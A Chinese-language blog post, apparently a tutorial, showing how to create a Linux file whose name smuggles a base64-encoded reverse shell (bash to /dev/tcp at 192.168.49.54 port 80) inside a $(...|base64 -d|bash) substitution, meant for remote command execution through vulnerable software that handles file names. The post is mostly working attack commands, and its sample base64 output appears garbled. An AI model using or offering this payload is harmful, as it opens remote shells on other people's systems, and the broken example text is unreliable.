Linux下生成包含bash命令的文件名的文件

关于如何绕过Linux限制的其他方式请查看:

https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions

我只是为了生成/创建包含bash命令的文件名而不是详细介绍Linux系统的文件命名规范,所以只需要考虑Linux系统文件命名的部分要求,文件名中的限制字符是我需要关注的,具体可以查看"限制字符"的链接。

1.可以使用大写和小写字母、数字、"."(点)和"_"(下划线)符号。

2.允许使用 \ 符号引用或转义空格、<、>、|、\、:、(、)、&、; 以及通配符(如 ? 和 *) 。

bash 复制代码
echo $\(echo `echo '/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1'|base64`\|base64 -d\|bash\) 

这个命令中单引号中的/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1是反弹shell的命令,也可以换成别的命令,这里的命令将会在之后被执行。

这条命令的输出类似这样:

bash 复制代码
$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash)

输出的命令进行这样的操作:输出一段base64的字符串,然后用base64工具解码,然后再把结果交给bash命令执行。这样做的好处是避免原来命令中包含特殊字符层层转义或者导致执行失败。

我现在要生成以这个输出作为文件名的文件,用echo ''> 文件名

bash 复制代码
echo '' > '$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash).jpg'

请注意,你完全可以不加文件名后缀.jpg,这在Linux中无关紧要。

下面这个图片里你能看到最终生成的文件名。

为什么要生成/创建这样的文件?

此文件将在某些Linux软件的漏洞中会被用来进行远程命令执行,这样的手段用来绕过Linux对文件名的限制。

相关推荐
轻松Ai享生活8 小时前
5 节课深入学习Linux Cgroups
linux
christine-rr8 小时前
linux常用命令(4)——压缩命令
linux·服务器·redis
三坛海会大神5558 小时前
LVS与Keepalived详解(二)LVS负载均衡实现实操
linux·负载均衡·lvs
東雪蓮☆8 小时前
深入理解 LVS-DR 模式与 Keepalived 高可用集群
linux·运维·服务器·lvs
乌萨奇也要立志学C++9 小时前
【Linux】进程概念(二):进程查看与 fork 初探
linux·运维·服务器
pc大老11 小时前
优化浏览体验:4个设置让Google Chrome更好用!
chrome·google·谷歌浏览器·谷歌·浏览器设置
獭.獭.11 小时前
Linux -- 信号【上】
linux·运维·服务器
智能化咨询11 小时前
【Linux】【实战向】Linux 进程替换避坑指南:从理解 bash 阻塞等待,到亲手实现能执行 ls/cd 的 Shell
前端·chrome
霍格沃兹软件测试开发11 小时前
快速掌握Dify+Chrome MCP:打造网页操控AI助手
人工智能·chrome·dify·mcp
hashiqimiya11 小时前
centos配置环境变量jdk
linux·运维·centos